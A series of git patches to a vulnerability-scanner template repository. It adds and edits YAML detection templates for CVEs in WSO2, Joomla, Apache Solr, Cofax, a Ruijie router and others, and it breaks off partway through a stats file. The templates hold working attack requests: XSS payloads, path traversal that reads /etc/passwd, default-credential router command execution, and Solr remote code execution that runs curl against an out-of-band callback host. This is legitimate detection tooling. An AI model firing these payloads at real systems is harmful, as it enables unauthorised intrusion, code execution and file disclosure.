http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + vendor: https://www.ruijienetworks.com + tags: ruijie,exposure + +requests: + - raw: + - | + POST /WEB_VMS/LEVEL15/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Content-Length: 111 + + command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. + + matchers-condition: and + matchers: + - type: word + words: + - "webmaster level 2 username guest password guest" + part: body + + - type: status + status: + - 200 From d60171ed9d14aef67472fd3661b3b89d3b2843d9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 6 Aug 2021 20:16:35 +0530 Subject: [PATCH 1459/4083] Added additional matchers --- cves/2017/CVE-2017-14651.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index af3f0c8f82..763aeee7c4 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -1,15 +1,16 @@ -id: WSO2 XSS +id: CVE-2017-14651 + info: - name: WSO2 XSS CVE-2017-14651 + name: Reflected XSS - WSO2 Data Analytics Server author: mass0ma severity: medium - tags: WSO2,XSS + description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + tags: cve,cve2017,wso2,xss requests: - method: GET path: - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E" - matchers-condition: and matchers: @@ -17,6 +18,11 @@ requests: - type: word words: - "" + - "Failed to add new collection" part: body condition: and + - type: word + words: + - "text/html" + part: header \ No newline at end of file From b59341b2737a1b5e1a75bc091329d3c90de8235b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 6 Aug 2021 21:23:46 +0530 Subject: [PATCH 1460/4083] minor update --- cves/2021/{CVE-2021–35336.yaml => CVE-2021-35336.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2021/{CVE-2021–35336.yaml => CVE-2021-35336.yaml} (100%) diff --git a/cves/2021/CVE-2021–35336.yaml b/cves/2021/CVE-2021-35336.yaml similarity index 100% rename from cves/2021/CVE-2021–35336.yaml rename to cves/2021/CVE-2021-35336.yaml From e75efd42da982d180322fb02f12b7dee537c1a33 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 6 Aug 2021 21:39:24 +0530 Subject: [PATCH 1461/4083] minor update --- cves/2017/CVE-2017-18024.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index b1adfa2dad..5928f214c0 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -18,16 +18,17 @@ requests: POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Content-Length: 44 - username=admin&password=admin&_submit_check=1&jlbqg%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1 + username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1 matchers-condition: and matchers: - type: word words: - - '' + - '' + - 'AvantFAX' part: body + condition: and - type: status status: From b4573b1392162cce377a2b9e77649d73b84ccbad Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 6 Aug 2021 11:24:01 -0500 Subject: [PATCH 1462/4083] Create CVE-2008-6668.yaml --- cves/2008/CVE-2008-6668.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2008/CVE-2008-6668.yaml diff --git a/cves/2008/CVE-2008-6668.yaml b/cves/2008/CVE-2008-6668.yaml new file mode 100644 index 0000000000..74d5620ad0 --- /dev/null +++ b/cves/2008/CVE-2008-6668.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-6668 + +info: + name: nweb2fax <= 0.2.7 Directory Traversal + description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. + reference: + - https://www.exploit-db.com/exploits/5856 + - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 + author: geeknik + severity: high + tags: nweb2fax,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - "root:.*:0:0:" From dfce16a68269c7bf8bb6db9583bfa932d7156f64 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 6 Aug 2021 11:35:36 -0500 Subject: [PATCH 1463/4083] Create CVE-2005-4385.yaml --- cves/2005/CVE-2005-4385.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2005/CVE-2005-4385.yaml diff --git a/cves/2005/CVE-2005-4385.yaml b/cves/2005/CVE-2005-4385.yaml new file mode 100644 index 0000000000..ddc8afd50c --- /dev/null +++ b/cves/2005/CVE-2005-4385.yaml @@ -0,0 +1,26 @@ +id: CVE-2005-4385 + +info: + name: Cofax <= 2.0RC3 XSS + description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + reference: + - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html + - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 + author: geeknik + severity: medium + tags: cofax,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3Csvg%2Fonload=alert(%27{{randstr}}%27)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "'>\"" From 12c2c849b909a6af5a8dd72ea1cf63d246b011b8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 6 Aug 2021 11:58:00 -0500 Subject: [PATCH 1464/4083] Create CVE-2006-1681.yaml --- cves/2006/CVE-2006-1681.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2006/CVE-2006-1681.yaml diff --git a/cves/2006/CVE-2006-1681.yaml b/cves/2006/CVE-2006-1681.yaml new file mode 100644 index 0000000000..9a8d8134d3 --- /dev/null +++ b/cves/2006/CVE-2006-1681.yaml @@ -0,0 +1,25 @@ +id: CVE-2006-1681 + +info: + name: Cherokee HTTPD <=0.5 XSS + description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + reference: + - https://www.securityfocus.com/bid/17408 + - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + author: geeknik + severity: medium + tags: cherokee,httpd,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/%2F..%3Cscript%3Ealert(%22{{randstr}}%22)%3B%3Cscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "' + + - type: word + words: + - '" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e3661a1c2d428cfd53f5277880990376788c1236 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 9 Aug 2021 06:22:49 +0700 Subject: [PATCH 1509/4083] Create CVE-2010-1979.yaml --- cves/2010/CVE-2010-1979.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1979.yaml diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml new file mode 100644 index 0000000000..21d8522a7b --- /dev/null +++ b/cves/2010/CVE-2010-1979.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1979 + +info: + name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12088 + - https://www.cvedetails.com/cve/CVE-2010-1979 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 8ab6fc07bcb558502eab0b63b8f2523dec94be04 Mon Sep 17 00:00:00 2001 From: adriyansyah-mf <72158292+adriyansyah-mf@users.noreply.github.com> Date: Mon, 9 Aug 2021 13:43:29 +0700 Subject: [PATCH 1510/4083] Update laravel-env.yaml added new path --- exposures/configs/laravel-env.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index c43b22a90f..091dcd18d7 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -2,7 +2,7 @@ id: laravel-env info: name: Laravel .env file - author: pxmme1337 & dwisiswant0 & geeknik & emenalf + author: pxmme1337 & dwisiswant0 & geeknik & emenalf & adrianmf severity: medium requests: @@ -17,6 +17,8 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env.backup" + - "{{BaseURL}}/.env.save" matchers-condition: and matchers: - type: regex From 3651410d37bf5ee0be96b4c1a53976c77f840933 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 9 Aug 2021 16:08:19 +0300 Subject: [PATCH 1511/4083] Provide description --- vulnerabilities/other/resin-inputfile-fileread.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/resin-inputfile-fileread.yaml b/vulnerabilities/other/resin-inputfile-fileread.yaml index ee8dc63107..6c110bef98 100644 --- a/vulnerabilities/other/resin-inputfile-fileread.yaml +++ b/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -3,6 +3,7 @@ info: name: Caucho Resin LFR author: princechaddha severity: high + description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. tags: resin,caucho,lfr requests: From 864b209cc1feb35edb14496181974f07adbf9e31 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 9 Aug 2021 16:10:10 +0300 Subject: [PATCH 1512/4083] Add reference --- vulnerabilities/other/resin-inputfile-fileread.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/resin-inputfile-fileread.yaml b/vulnerabilities/other/resin-inputfile-fileread.yaml index 6c110bef98..ec2b937c94 100644 --- a/vulnerabilities/other/resin-inputfile-fileread.yaml +++ b/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -5,6 +5,7 @@ info: severity: high description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. tags: resin,caucho,lfr + reference: https://blkstone.github.io/2017/10/30/resin-attack-vectors/ requests: - method: GET From a806149864a648b75640c11978fa102877fed3ea Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 9 Aug 2021 16:31:00 +0300 Subject: [PATCH 1513/4083] Spelling --- vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index c106f95dbd..fd92d1f28d 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -4,7 +4,7 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - referemce: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog requests: From 14d2dcd26b793cfec2f7721f2bd62799621c2811 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 9 Aug 2021 16:35:43 +0300 Subject: [PATCH 1514/4083] reference --- cves/2018/CVE-2018-17254.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 0ddbcdcd8c..003557af06 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -6,6 +6,9 @@ info: description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: high tags: joomla,sqli,cve,cve2018 + reference: | + - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html + - https://www.exploit-db.com/exploits/45423/ requests: - raw: From d8e0fd3ef0ab77ba5b07b00a26fa755894a4c34f Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:40:04 -0300 Subject: [PATCH 1515/4083] add cors-misconfig.yaml --- cors-misconfig.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cors-misconfig.yaml diff --git a/cors-misconfig.yaml b/cors-misconfig.yaml new file mode 100644 index 0000000000..4d3fff5153 --- /dev/null +++ b/cors-misconfig.yaml @@ -0,0 +1,23 @@ +id: cors-misconfig + +info: + name: Cross-Origin Resource Sharing Misconfiguration + author: G4L1T0 and @convisoappsec + severity: info + tags: cors + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 + Origin: https://www.convisoappsec.com + matchers: + - type: word + part: header + words: + - "Access-Control-Allow-Origin: https://www.convisoappsec.com" + - "Access-Control-Allow-Origin: *" + condition: or + From e98fb7179e1c2ca2895806fe3dd78ef7b651b8c6 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:56:37 -0300 Subject: [PATCH 1516/4083] update cors-misconfig.yaml --- .../generic/cors-misconfig.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cors-misconfig.yaml => vulnerabilities/generic/cors-misconfig.yaml (100%) diff --git a/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml similarity index 100% rename from cors-misconfig.yaml rename to vulnerabilities/generic/cors-misconfig.yaml From a44324ec2f2b57bea9a3e2a6d2a696d9771ccef7 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Mon, 9 Aug 2021 11:57:37 -0300 Subject: [PATCH 1517/4083] updatev2 cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml index 4d3fff5153..6c3b810df0 100644 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ b/vulnerabilities/generic/cors-misconfig.yaml @@ -2,7 +2,7 @@ id: cors-misconfig info: name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec + author: G4L1T0 and @convisoappsec severity: info tags: cors @@ -20,4 +20,3 @@ requests: - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - "Access-Control-Allow-Origin: *" condition: or - From 07aa96ed15d4d6258c92c829e50ed2e807890770 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 Aug 2021 20:55:06 +0530 Subject: [PATCH 1518/4083] Fixing CVE-2017-12629 --- cves/2017/CVE-2017-12629.yaml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index 30abb5da9a..172caf79e7 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -1,26 +1,36 @@ id: CVE-2017-12629 info: - name: Apache Solr <= 7.1 Remote Code Execution via SSRF + name: Apache Solr <= 7.1 XML entity injection author: dwisiswant0 severity: critical - tags: cve,cve2017,solr,apache,rce,ssrf,oob + tags: cve,cve2017,solr,apache,oob,xxe reference: | - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - - https://twitter.com/honoki/status/1298636315613974532/photo/1 + - https://twitter.com/honoki/status/1298636315613974532 + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE requests: - raw: - | - GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1 + GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - | - GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1 + GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1 Host: {{Hostname}} matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" \ No newline at end of file + - "http" + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' \ No newline at end of file From 77c83d359a5c63a1c5225c0f39c6c5b7277a326d Mon Sep 17 00:00:00 2001 From: Chapman Schleiss Date: Mon, 9 Aug 2021 10:14:25 -0600 Subject: [PATCH 1519/4083] Adding Cisco Meraki to misconfigurations --- misconfiguration/cisco-meraki.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/cisco-meraki.yaml diff --git a/misconfiguration/cisco-meraki.yaml b/misconfiguration/cisco-meraki.yaml new file mode 100644 index 0000000000..9e77ed2eaf --- /dev/null +++ b/misconfiguration/cisco-meraki.yaml @@ -0,0 +1,25 @@ +id: cisco-meraki + +info: + name: Cisco Meraki Information Disclosure + author: r3naissance + severity: low + description: Sensitive environment variables may not be masked + tags: cisco,meraki,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/#connection" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "meraki" + - "This security appliance is directly connected to a local network" + condition: and + + - type: status + status: + - 200 From 31eddda708376d737ac7b765a75d1ff304f1d5c3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 9 Aug 2021 21:53:05 +0530 Subject: [PATCH 1520/4083] Create azkaban-web-client.yaml --- exposed-panels/azkaban-web-client.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/azkaban-web-client.yaml diff --git a/exposed-panels/azkaban-web-client.yaml b/exposed-panels/azkaban-web-client.yaml new file mode 100644 index 0000000000..8d916af0d2 --- /dev/null +++ b/exposed-panels/azkaban-web-client.yaml @@ -0,0 +1,22 @@ +id: azkaban-web-client + +info: + name: Azkaban Web Client + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Azkaban Web Client' + - type: status + status: + - 200 From c0db6492788216bdd52b202ce79bb7df209a4cc9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 Aug 2021 21:57:30 +0530 Subject: [PATCH 1521/4083] Added CVE-2019-0193 - Apache Solr - DataImportHandler RCE --- cves/2019/CVE-2019-0193.yaml | 47 ++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 cves/2019/CVE-2019-0193.yaml diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml new file mode 100644 index 0000000000..77a2a57b9d --- /dev/null +++ b/cves/2019/CVE-2019-0193.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-0193 + +info: + name: Apache Solr - DataImportHandler RCE + description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. + author: pdteam + severity: critical + refrense: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 + - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 + - https://paper.seebug.org/1009/ + tags: cve,cve2019,apache,rce,solr,oob + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1 + Host: {{Hostname}} + Content-type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 From 8c48ca97d21d34bb58c968a32ea43c57273f88d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 Aug 2021 21:58:28 +0530 Subject: [PATCH 1522/4083] matcher + payload + regex updates --- cves/2019/CVE-2019-17558.yaml | 41 ++++++++----------- cves/2021/CVE-2021-27905.yaml | 7 ++-- misconfiguration/solr-query-dashboard.yaml | 1 + .../apache/apache-solr-file-read.yaml | 21 ++++++---- 4 files changed, 35 insertions(+), 35 deletions(-) diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 9a90fab202..b2bce65dad 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -4,7 +4,7 @@ info: author: pikpikcu,madrobot severity: critical refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - tags: cve,cve2019,apache,rce,solr + tags: cve,cve2019,apache,rce,solr,oob requests: - raw: @@ -15,15 +15,10 @@ requests: Connection: close - | - POST /solr/{{collection}}/config HTTP/1.1 + POST /solr/{{core}}/config HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close Content-Type: application/json Content-Length: 259 - Upgrade-Insecure-Requests: 1 { "update-queryresponsewriter": { @@ -37,25 +32,25 @@ requests: } - | - GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Connection: close - Upgrade-Insecure-Requests: 1 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 extractors: - type: regex - regex: - - '"status"\:\{"(.*?)"\:\{"name"' - name: collection - group: 1 internal: true - - matchers: - - type: word - words: - - "Non-authoritative answer" - - "example.com" - condition: and + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index 5b4805182a..e4111c2863 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -26,13 +26,14 @@ requests: Accept-Language: en Connection: close + extractors: - type: regex - regex: - - '"status"\:\{"(.*?)"\:\{"name"' + internal: true name: core group: 1 - internal: true + regex: + - '"name"\:"(.*?)"' matchers: - type: word diff --git a/misconfiguration/solr-query-dashboard.yaml b/misconfiguration/solr-query-dashboard.yaml index 5c05e06f2e..c49aca838f 100644 --- a/misconfiguration/solr-query-dashboard.yaml +++ b/misconfiguration/solr-query-dashboard.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - 'Solr admin page' + - type: status status: - 200 diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index eec12c37dc..2cf4a6bdcd 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -24,18 +24,21 @@ requests: Accept-Language: en Connection: close + extractors: - type: regex - regex: - - '"status"\:\{"(.*?)"\:\{"name"' + internal: true name: core group: 1 - internal: true + regex: + - '"name"\:"(.*?)"' - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'regex("root:.*:0:0:", body_2)' - condition: and \ No newline at end of file + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file From 4f0a3510faf86158ef26949d83b558406bce3bb1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 Aug 2021 23:51:31 +0530 Subject: [PATCH 1523/4083] matcher update --- cves/2019/CVE-2019-12616.yaml | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index adf46bd388..d3d88387c0 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -21,22 +21,13 @@ requests: - type: word words: - - "phpMyAdmin" + - "phpmyadmin.net" - type: regex regex: - - 'v=([1-4]\.[0-8].*)' # 4.9.0.1 - - 'v=4.9.0.1' - condition: or + - 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0 - type: status status: - 200 - 401 - - extractors: - - type: regex - part: body - group: 1 - regex: - - "v=([a-z0-9-._]+)" From 1b8da424eff2020b54c953938e61cd3a6c8fc94b Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 00:51:51 +0530 Subject: [PATCH 1524/4083] manual stats update --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1382 +++++++++++++++++++++--------------------- TOP-10.md | 24 +- 3 files changed, 711 insertions(+), 697 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 